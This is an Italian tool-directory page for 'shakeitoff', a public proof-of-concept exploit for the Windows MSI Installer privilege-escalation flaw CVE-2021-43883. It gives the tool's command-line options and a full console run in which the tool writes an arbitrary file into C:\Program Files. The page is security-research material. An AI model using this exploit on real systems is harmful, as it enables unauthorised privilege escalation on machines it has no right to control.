Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
shakeitoff — Windows MSI Installer LPE (CVE-2021-43883) | Kitploit
Strumenti/GitHubGitHub/jbaines-r7/shakeitoff
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration Testing
GitHubjbaines-r7/shakeitoff

shakeitoff

Windows MSI Installer LPE (CVE-2021-43883)

Vedi Repository
79164 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

shakeitoff

Una versione più piccola, ridotta e pulita di InstallerFileTakeOver, ovvero l'exploit zero-day che è una "variante" di CVE-2021-41379 (successivamente assegnato come CVE-2021-43883). Questa versione non apre una shell come InstallerFileTakeOver. Lo scopo di questo codice era creare una prova di concetto più semplice che dimostri in modo più affidabile l'attacco di creazione di file. Questa prova di concetto crea il file arbitrario richiesto dall'utente (e si copia al suo interno per dimostrare la scrivibilità). Dimostrare l'esecuzione di codice è un esercizio banale lasciato al lettore.

Per capire come funziona l'attacco, consulta l'analisi su AttackerKB.

Utilizzo

Lo strumento richiede tre parametri:

root@kitploit:~
C:\Users\albinolobster\source\repos\shakeitoff\x64\Release>.\shakeitoff.exe
option "msi_path" is required
Allowed options:
  -h, --help              produce help message
  -m, --msi_path arg      The path to the MSI to install
  -i, --install_path arg  The path to install to
  -p, --target_path arg   The file to create
  1. -m - il file msi da installare (percorso completo richiesto). Uno è fornito in questo repository (e dovresti usarlo perché i percorsi dei file contano davvero).
  2. -i - il percorso di installazione (percorso completo richiesto). È qui che viene installato il file msi / dove avviene l'exploit. L'utente deve specificarlo in anticipo e deve essere una directory vuota. Lo strumento non la pulisce perché rende più semplice capire il bug. Deve anche esserci una barra finale \ perché sono un mostro.
  3. -p - il file da sovrascrivere/creare. Percorso completo richiesto.

La PoC si limiterà a copiare se stessa nel file target.

Esempio di utilizzo

root@kitploit:~
C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

File Not Found

C:\Users\Public>.\shakeitoff.exe -m C:\Users\Public\shakeitoff.msi -i C:\Users\Public\lol\ -p "C:\Program Files\lol"
[+] User provided MSI path: C:\Users\Public\shakeitoff.msi
[+] The target path is: C:\Program Files\lol
[+] Create the temp directory structure we'll install into
[+] Grabbing handle to lock C:\Users\Public\lol\shakeitoff\haters.jpg
[+] Grabbing a directory handle of C:\Users\Public\lol\shakeitoff\
[+] Monitor shakeitoff\shakeitoff for an rbf file
[+] MSI install: ACTION=ADMIN REBOOT=ReallySuppress TARGETDIR=C:\Users\Public\lol\ C:\Users\Public\shakeitoff.msi
[+] Grabbing a handle to inner shakeitoff directory
[+] In callback for oplock one
[+] Opening handle to C:\Users\Public\lol\shakeitoff\8da858.rbf
[+] Creating the callback directory at C:\Users\Public\lol\cb_directory
[+] Grab a handle for the callback directry
[+] Creating a junction from C:\Users\Public\lol\cb_directory to \BaseNamedObjects\Restricted
[+] Inside callback two
[+] Release the hater.jpg handle to unlock
[+] Move the rbf file to C:\Users\Public\lol\weird_directory
[+] Move inner shakeitoff to C:\Users\Public\lol\weird_directory
[+] Move junction at C:\Users\Public\lol\cb_directory to C:\Users\Public\lol\shakeitoff
[+] Configuring symlink from \BaseNamedObjects\Restricted\8da858.rbf to \??\C:\Program Files\lol
[+] symlink created!
[+] MsiInstallProductA return value: 1603
[+] Exploit thread joined
[+] Copy into target!

C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

12/02/2021  02:01 PM           368,640 lol
               1 File(s)        368,640 bytes
               0 Dir(s)  86,015,610,880 bytes free

Crediti

  • Questo codice è influenzato dall'exploit originale pubblicato da Abdelhamid Naceri (che è anche lo scopritore originale della vulnerabilità!).
  • Il codice FileOpLock è una versione (leggermente modificata) estratta da angrypolarbearbug2
  • Taylor Swift
Scarica lo strumento